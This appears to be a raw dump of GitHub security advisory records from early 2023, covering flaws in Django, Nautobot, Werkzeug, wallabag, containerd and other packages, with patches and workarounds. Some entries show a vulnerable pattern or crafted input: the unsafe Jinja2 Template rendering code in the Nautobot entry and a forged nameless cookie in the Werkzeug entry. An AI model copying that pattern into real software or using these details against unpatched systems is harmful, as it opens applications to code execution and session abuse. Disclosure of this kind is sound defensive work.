[{'type': 'WEB', 'url': 'https://github.com/containerd/containerd/security/advisories/GHSA-hmfx-3pcx-653p'}, {'type': 'WEB', 'url': 'https://github.com/moby/moby/security/advisories/GHSA-rc4r-wh2q-q6c4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25173'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/commit/133f6bb6cd827ce35a5fb279c1ead12b9d21460a'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-4wjj-jwc9-2x96'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-fjm8-m7m6-2fjp'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-phjr-8j92-w5v7'}, {'type': 'PACKAGE', 'url': 'https://github.com/containerd/containerd'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.5.18'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.6.18'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYZOKMMVX4SIEHPJW3SJUQGMO5YZCPHC/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XNF4OLYZRQE75EB5TW5N42FSXHBXGWFE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTE4ITXXPIWZEQ4HYQCB6N6GZIMWXDAI/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1574'}, {'type': 'WEB', 'url': 'https://www.benthamsgaze.org/2022/08/22/vulnerability-in-linux-containers-investigation-and-mitigation/'}]
|
{'cwe_ids': ['CWE-269', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T14:11:33Z', 'nvd_published_at': '2023-02-16T15:15:00Z'}
|
1.4.0
|
GHSA-p4xx-w6fr-c4w9
|
2023-02-10T00:20:55Z
|
2023-02-02T06:30:26Z
| null |
['CVE-2023-25015']
|
Clockwork Web contains a Cross-Site Request Forgery Vulnerability with Rails < 5.2
|
Clockwork Web before 0.1.2, when used with Rails before 5.2 is used, allows Cross-Site Request Forgery (CSRF). A CSRF attack works by getting an authorized user to visit a malicious website and then performing requests on behalf of the user. In this instance, actions include enabling and disabling jobs. All users running an affected release on Rails < 5.2 should upgrade immediately.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'RubyGems', 'name': 'clockwork_web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25015'}, {'type': 'WEB', 'url': 'https://github.com/ankane/clockwork_web/issues/4'}, {'type': 'WEB', 'url': 'https://github.com/ankane/clockwork_web/commit/ec2896503ee231588547c2fad4cb93a94e78f857'}, {'type': 'PACKAGE', 'url': 'https://github.com/ankane/clockwork_web'}, {'type': 'WEB', 'url': 'https://github.com/ankane/clockwork_web/compare/v0.1.1...v0.1.2'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/clockwork_web/CVE-2023-25015.yml'}]
|
{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T23:07:04Z', 'nvd_published_at': '2023-02-02T04:15:00Z'}
|
1.4.0
|
GHSA-344m-qcjq-xgrf
|
2023-02-14T00:30:22Z
|
2023-02-14T00:30:22Z
| null |
[]
|
Vulnerable OpenSSL included in sgx-dcap-quote-verify-python
|
sgx-dcap-quote-verify-python includes a statically linked copy of OpenSSL. The version of OpenSSL included in sgx-dcap-quote-verify-python 0.0.1..0.0.2 is vulnerable to a security issue. More details about the OpenSSL vulnerabilities themselves can be found at https://www.openssl.org/news/secadv/20230207.txt.
## Analysis
The binding includes OpenSSL version 1.1.1s which is vulnerable to the vulnerabilities disclosed in [OpenSSL Security Advisory from the 7th February 2023](https://www.openssl.org/news/secadv/20230207.txt).
The binding does not directly use OpenSSL. The binding calls the SGX Quote Verification Library which uses OpenSSL.
## Explanation
The SGX Quote Verification Library uses OpenSSL as a dependency to perform its cryptographic operations and certificate verification.
The OpenSSL security advisory mentions multiple vulnerabilities but I believe the most concerning would be CVE-2023-0286 “X.400 address type confusion in X.509 GeneralName”. Its severity is rated high and the advisory states that “this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.”
Relying on CRLs obtained from an untrusted party is exactly what can happen when verifying a quote. For instance, the vulnerability could be triggered through the "sgx_qv_verify_quote" function which can take untrusted quote collateral as input. The quote collateral contains a CRL and certificate chains. The Quote Verification Library uses OpenSSL to verify the validity of those in order to establish the authenticity of the quote. Thus the vulnerability could be exploited with corrupted/forged collateral and quote.
## Impact
According to the advisory the "vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service". Transitively I expect the same to be true for the Quote Verification Library.
The denial of service impact is not much of a concern I believe since processing forged collateral would most likely stop the software from proceeding normally anyway (forged collateral should be rejected). The part regarding the ability to read memory contents, could result in information disclosure which is a real concern. The quote verification happens on the relying party end, which might use it to check enclave authenticity before providing sensitive data, this vulnerability could therefore result in the leakage of sensitive data.
|
[]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'sgx-dcap-quote-verify-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.3'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/mithril-security/sgx-dcap-quote-verify-python/security/advisories/GHSA-344m-qcjq-xgrf'}, {'type': 'PACKAGE', 'url': 'https://github.com/mithril-security/sgx-dcap-quote-verify-python'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T00:30:22Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-2hrw-hx67-34x6
|
2023-02-23T21:23:27Z
|
2023-02-15T03:30:47Z
| null |
['CVE-2023-24580']
|
Resource exhaustion in Django
|
An issue was discovered in the Multipart Request Parser in Django 3.2 before 3.2.18, 4.0 before 4.0.10, and 4.1 before 4.1.7. Passing certain inputs (e.g., an excessive number of parts) to multipart forms could result in too many open files or memory exhaustion, and provided a potential vector for a denial-of-service attack.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.2.18'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.7'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.10'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24580'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/628b33a854a9c68ec8a0c51f382f304a0044ec92'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/83f1ea83e4553e211c1c5a0dfc197b66d4e50432'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/a665ed5179f5bbd3db95ce67286d0192eff041d8'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/4.1/releases/security/'}, {'type': 'PACKAGE', 'url': 'https://github.com/django/django'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!forum/django-announce'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/02/msg00023.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FKYVMMR7RPM6AHJ2SBVM2LO6D3NGFY7B/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HWY6DQWRVBALV73BPUVBXC3QIYUM24IK/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LTZVAKU5ALQWOKFTPISE257VCVIYGFQI/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VZS4G6NSZWPTVXMMZHJOJVQEPL3QTO77/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YJB6FUBBLVKKG655UMTLQNN6UQ6EDLSP/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230316-0006/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2023/feb/14/security-releases/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/02/14/1'}]
|
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T17:42:14Z', 'nvd_published_at': '2023-02-15T01:15:00Z'}
|
1.4.0
|
GHSA-8mfq-f5wj-vw5m
|
2023-03-03T23:16:35Z
|
2023-02-22T00:04:02Z
| null |
['CVE-2023-25657']
|
Nautobot vulnerable to remote code execution via Jinja2 template rendering
|
### Impact
_What kind of vulnerability is it? Who is impacted?_
All users of Nautobot versions earlier than 1.5.7 are impacted.
In Nautobot 1.5.7 we have enabled sandboxed environments for the Jinja2 template engine used internally for template rendering for the following objects:
- `extras.ComputedField`
- `extras.CustomLink`
- `extras.ExportTemplate`
- `extras.Secret`
- `extras.Webhook`
While we are not aware of any active exploits, we have made this change as a preventative measure to protect against any potential remote code execution attacks utilizing maliciously crafted template code.
This change forces the Jinja2 template engine to use a [`SandboxedEnvironment`](https://jinja.palletsprojects.com/en/3.0.x/sandbox/#sandbox) on all new installations of Nautobot.
This addresses any potential unsafe code execution everywhere the helper function `nautobot.utilities.utils.render_jinja2` is called. Additionally, our documentation that was previously suggesting the direct use of `jinja2.Template` has been revised to utilize `render_jinja2`.
### Patches
_Has the problem been patched? What versions should users upgrade to?_
Yes. Users should upgrade to Nautobot 1.5.7 or newer.
### Workarounds
_Is there a way for users to fix or remediate the vulnerability without upgrading?_
##### Enabling Sandboxed Environments
For users that are unable to upgrade to the latest release of Nautobot, you may add the following setting to your `nautobot_config.py` to apply the sandbox environment enforcement:
```python
TEMPLATES[1]["OPTIONS"]["environment"] = "jinja2.sandbox.SandboxedEnvironment"
```
After applying this change, you must restart all Nautobot services, including any Celery worker processes.
**Note:** *Nautobot specifies two template engines by default, the first being “django” for the Django built-in template engine, and the second being “jinja” for the Jinja2 template engine. This recommended setting will update the second item in the list of template engines, which is the Jinja2 engine.*
##### Restricting Jinja2 using Access Controls
For users that are unable to immediately update their configuration such as if a Nautobot service restart is too disruptive to operations, access to provide custom Jinja2 template values may be mitigated using permissions to restrict “change” (write) actions to the affected object types listed in the first section.
**Note:** *This solution is intended to be stopgap until you can successfully update your `nautobot_config.py` or upgrade your Nautobot instance to apply the sandboxed environment enforcement.*
#### Updating Existing App or Job Code
For Nautobot App (formerly plugin) authors or Job authors, additionally we recommend that if you have any custom code that may for example be using `jinaj2.Template` that you no longer use that. Instead, please always use our `nautobot.utilities.utils.render_jinja2` function which will make sure that the centrally-provided Jinja2 template engine with sandboxing enforced is being utilized.
Anywhere you’ve been using this pattern:
```python
from jinja2 import Template
my_template = Template(template_code)
config = my_template.render(context)
```
We recommend that you replace it with this pattern:
```python
from nautobot.utilities.utils import render_jinja2
config = render_jinja2(template_code, context)
```
### References
_Are there any links users can visit to find out more?_
Please see the Nautobot 1.5.7 release notes.
https://docs.nautobot.com/projects/core/en/stable/release-notes/version-1.5/#v157-2023-01-04
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'nautobot'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.7'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/nautobot/nautobot/security/advisories/GHSA-8mfq-f5wj-vw5m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25657'}, {'type': 'WEB', 'url': 'https://github.com/nautobot/nautobot/commit/d47f157e83b0c353bb2b697f911882c71cf90ca0'}, {'type': 'WEB', 'url': 'https://docs.nautobot.com/projects/core/en/stable/release-notes/version-1.5/#v157-2023-01-04'}, {'type': 'PACKAGE', 'url': 'https://github.com/nautobot/nautobot'}, {'type': 'WEB', 'url': 'https://jinja.palletsprojects.com/en/3.0.x/sandbox/#sandbox'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:04:02Z', 'nvd_published_at': '2023-02-21T21:15:00Z'}
|
1.4.0
|
GHSA-g9ph-r9hc-34r8
|
2023-02-22T19:16:24Z
|
2023-02-21T00:30:20Z
| null |
['CVE-2021-32853']
|
Erxes vulnerable to Cross-site Scripting
|
Erxes, an experience operating system (XOS) with a set of plugins, is vulnerable to cross-site scripting in all versions. This results in client-side code execution. The victim must follow a malicious link or be redirected there from malicious web site. There are no known patches.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'erxes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32853'}, {'type': 'PACKAGE', 'url': 'https://github.com/erxes/erxes'}, {'type': 'WEB', 'url': 'https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/index.ts#L54'}, {'type': 'WEB', 'url': 'https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/views/widget.ejs#L14'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-103-erxes/'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T19:16:24Z', 'nvd_published_at': '2023-02-20T23:15:00Z'}
|
1.4.0
|
GHSA-gvg3-83q4-rfhq
|
2023-02-22T22:17:59Z
|
2023-02-14T15:30:28Z
| null |
['CVE-2023-25141']
|
Command injection in Apache Sling
|
Apache Sling JCR Base < 3.1.12 has a critical injection vulnerability when running on old JDK versions (JDK 1.8.191 or earlier) through utility functions in RepositoryAccessor. The functions getRepository and getRepositoryFromURL allow an application to access data stored in a remote location via JDNI and RMI. Users of Apache Sling JCR Base are recommended to upgrade to Apache Sling JCR Base 3.1.12 or later, or to run on a more recent JDK.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.sling:org.apache.sling.jcr.base'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.12'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25141'}, {'type': 'WEB', 'url': 'https://github.com/apache/sling-org-apache-sling-jcr-base/commit/6ed0a030fd5f13774aff0073c55cbe3ace0153cb'}, {'type': 'WEB', 'url': 'https://github.com/apache/sling-org-apache-sling-jcr-base/commit/779d8a7dd0437a4f31de02c0d995afcf83b9904b'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/sling-org-apache-sling-jcr-base'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/SLING-11770'}, {'type': 'WEB', 'url': 'https://sling.apache.org/news.html'}]
|
{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T21:24:47Z', 'nvd_published_at': '2023-02-14T13:15:00Z'}
|
1.4.0
|
GHSA-qh6w-pq52-qxxq
|
2023-03-01T01:49:02Z
|
2023-02-19T03:30:18Z
| null |
['CVE-2023-0914']
|
Pixelfed may allow unauthorized actor to view private posts
|
Improper Authorization in GitHub repository pixelfed/pixelfed 0.11.4 and prior.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pixelfed/pixelfed'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.11.4'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0914'}, {'type': 'WEB', 'url': 'https://github.com/pixelfed/pixelfed/commit/ef56f92c3d77e9bafaa70c08b7c04d5a61b8d454'}, {'type': 'PACKAGE', 'url': 'https://github.com/pixelfed/pixelfed'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/54d5fd76-e038-4eda-9e03-d5e95e09c0ec'}]
|
{'cwe_ids': ['CWE-285'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:04:37Z', 'nvd_published_at': '2023-02-19T01:15:00Z'}
|
1.4.0
|
GHSA-7j9m-j397-g4wx
|
2023-03-03T22:58:41Z
|
2023-02-21T21:30:18Z
| null |
['CVE-2022-48282']
|
MongoDB .NET/C# Driver vulnerable to Deserialization of Untrusted Data
|
Under very specific circumstances, a privileged user is able to cause arbitrary code to be executed which may cause further disruption to services. This is specific to applications written in C#. This affects all MongoDB .NET/C# Driver versions prior to and including v2.18.0
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'NuGet', 'name': 'MongoDB.Driver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.19.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-48282'}, {'type': 'PACKAGE', 'url': 'https://github.com/mongodb/mongo-csharp-driver'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-csharp-driver/releases/tag/v2.19.0'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/CSHARP-4475'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/CSHARP-4475'}]
|
{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:58:41Z', 'nvd_published_at': '2023-02-21T19:15:00Z'}
|
1.4.0
|
GHSA-qwx8-mxxx-mg96
|
2023-02-02T19:27:29Z
|
2023-02-02T19:26:44Z
| null |
['CVE-2023-0609']
|
wallabag contains Improper Authorization via export feature
|
# Description
The export feature lets a user export a single entry or a set of entries in a given format (_e.g. PDF, MOBI, TXT_).
For example, `https://yourinstance.wallabag.org/export/45.pdf` will export the entry with id 45 in PDF format.
Since wallabag 2.0.0-alpha.1, this feature is vulnerable to an insecure direct object reference attack. A logged user can export any single entry without ownership validation.
This is due to a lack of access validation in the `downloadEntryAction` method.
**You should immediately patch your instance to version 2.5.3 or higher if you have more than one user and/or having open registration.**
# Resolution
A user check is now done in the vulnerable method before sending the exported entry.
The `Entry` retrieval through a `ParamConverter` has also been replaced with a call to the `EntryRepository` in order to prevent any information disclosure through response discrepancy.
# Workaround
If you are unable to update to the latest version or if you want to temporarily limit risk of exploitation, you may consider blocking requests to the endpoint `/export/*`.
E.g. with nginx:
``` nginx
location /export {
deny all;
}
```
# Credits
We would like to thank @bAuh0lz for reporting this issue through huntr.dev.
Reference: https://www.huntr.dev/bounties/3adef66f-fc86-4e6d-a540-2ffa59342ff0/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'wallabag/wallabag'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-alpha.1'}, {'fixed': '2.5.3'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/security/advisories/GHSA-qwx8-mxxx-mg96'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0609'}, {'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/commit/0f7460dbab9e29f4f7d2944aca20210f828b6abb'}, {'type': 'PACKAGE', 'url': 'https://github.com/wallabag/wallabag'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/3adef66f-fc86-4e6d-a540-2ffa59342ff0'}]
|
{'cwe_ids': ['CWE-285'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T19:26:44Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-mjv2-6jv4-vrg7
|
2023-03-03T23:11:14Z
|
2023-02-23T15:33:05Z
| null |
['CVE-2023-0867']
|
OpenNMS Meridian and Horizon vulnerable to Cross-site Scripting
|
Multiple stored and reflected cross-site scripting vulnerabilities in webapp jsp pages in multiple versions of OpenNMS Meridian and Horizon could allow an attacker access to confidential session information.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '31.0.4'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0867'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/5765'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/9a366e6822479579e642b58058568af37658baba'}, {'type': 'WEB', 'url': 'https://docs.opennms.com/meridian/2022/releasenotes/changelog.html#releasenotes-changelog-Meridian-2022.1.13'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenNMS/opennms'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T23:11:14Z', 'nvd_published_at': '2023-02-23T15:15:00Z'}
|
1.4.0
|
GHSA-px8h-6qxv-m22q
|
2023-02-15T15:37:03Z
|
2023-02-15T15:37:03Z
| null |
['CVE-2023-23934']
|
Incorrect parsing of nameless cookies leads to __Host- cookies bypass
|
Browsers may allow "nameless" cookies that look like `=value` instead of `key=value`. A vulnerable browser may allow a compromised application on an adjacent subdomain to exploit this to set a cookie like `=__Host-test=bad` for another subdomain.
Werkzeug <= 2.2.2 will parse the cookie `=__Host-test=bad` as `__Host-test=bad`. If a Werkzeug application is running next to a vulnerable or malicious subdomain which sets such a cookie using a vulnerable browser, the Werkzeug application will see the bad cookie value but the valid cookie key.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'Werkzeug'}, 'ecosystem_specific': {'affected_functions': ['werkzeug.http.parse_cookie']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.3'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pallets/werkzeug/security/advisories/GHSA-px8h-6qxv-m22q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23934'}, {'type': 'WEB', 'url': 'https://github.com/pallets/werkzeug/commit/cf275f42acad1b5950c50ffe8ef58fe62cdce028'}, {'type': 'PACKAGE', 'url': 'https://github.com/pallets/werkzeug'}, {'type': 'WEB', 'url': 'https://github.com/pallets/werkzeug/releases/tag/2.2.3'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230818-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5470'}]
|
{'cwe_ids': ['CWE-20'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T15:37:03Z', 'nvd_published_at': '2023-02-14T20:15:00Z'}
|
1.4.0
|
GHSA-vf8h-2wwj-jq22
|
2023-06-27T21:05:30Z
|
2023-02-15T12:30:26Z
| null |
['CVE-2022-42735']
|
Privilege escalation in Apache ShenYu
|
Improper Privilege Management vulnerability in Apache Software Foundation Apache ShenYu. ShenYu Admin allows low-privilege low-level administrators create users with higher privileges than their own. This issue affects Apache ShenYu: 2.5.0. Upgrade to Apache ShenYu 2.5.1 or apply patch https://github.com/apache/shenyu/pull/3958.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.shenyu:shenyu-admin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-42735'}, {'type': 'WEB', 'url': 'https://github.com/apache/shenyu/pull/3958'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/shenyu'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/2k8764jmckmc19qc8x51nlnngq71pcf7'}]
|
{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T18:16:56Z', 'nvd_published_at': '2023-02-15T10:15:00Z'}
|
1.4.0
|
GHSA-qgc7-mgm3-q253
|
2023-06-13T23:47:06Z
|
2023-02-17T13:59:44Z
| null |
['CVE-2022-41727']
|
Uncontrolled Resource Consumption in golang.org/x/image
|
An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'golang.org/x/image'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-41727'}, {'type': 'WEB', 'url': 'https://go.dev/cl/468195'}, {'type': 'WEB', 'url': 'https://go.dev/issue/58003'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1572'}]
|
{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-17T13:59:44Z', 'nvd_published_at': '2023-02-28T18:15:00Z'}
|
1.4.0
|
GHSA-6fcj-9vfw-jq2m
|
2023-02-23T22:07:44Z
|
2023-02-13T21:31:04Z
| null |
['CVE-2023-24188']
|
Arbitrary file deletion in ureport
|
ureport v2.2.9 was discovered to contain an arbitrary file deletion vulnerability.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.bstek.ureport:ureport2-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.9'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24188'}, {'type': 'WEB', 'url': 'https://github.com/Venus-WQLab/bug_report/blob/main/ureport/ureport-cve-2023-24188.md'}, {'type': 'WEB', 'url': 'https://github.com/cgddgc/vulns/blob/main/ureport2-filedelete-vuln.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/youseries/ureport'}, {'type': 'WEB', 'url': 'http://ureport.com'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T00:28:52Z', 'nvd_published_at': '2023-02-13T20:15:00Z'}
|
1.4.0
|
GHSA-mgmm-cmhj-2h5f
|
2023-03-03T00:15:14Z
|
2023-02-22T09:30:18Z
| null |
['CVE-2023-0949']
|
modoboa Cross-site Scripting vulnerability
|
Cross-site Scripting (XSS) - Reflected in GitHub repository modoboa/modoboa prior to 2.0.45.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'modoboa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.5'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0949'}, {'type': 'WEB', 'url': 'https://github.com/modoboa/modoboa/commit/aa74e9a4a870162eea169e0a6a2eab841f8811b7'}, {'type': 'PACKAGE', 'url': 'https://github.com/modoboa/modoboa'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ef87be4e-493b-4ee9-9738-44c55b8acc19'}]
|
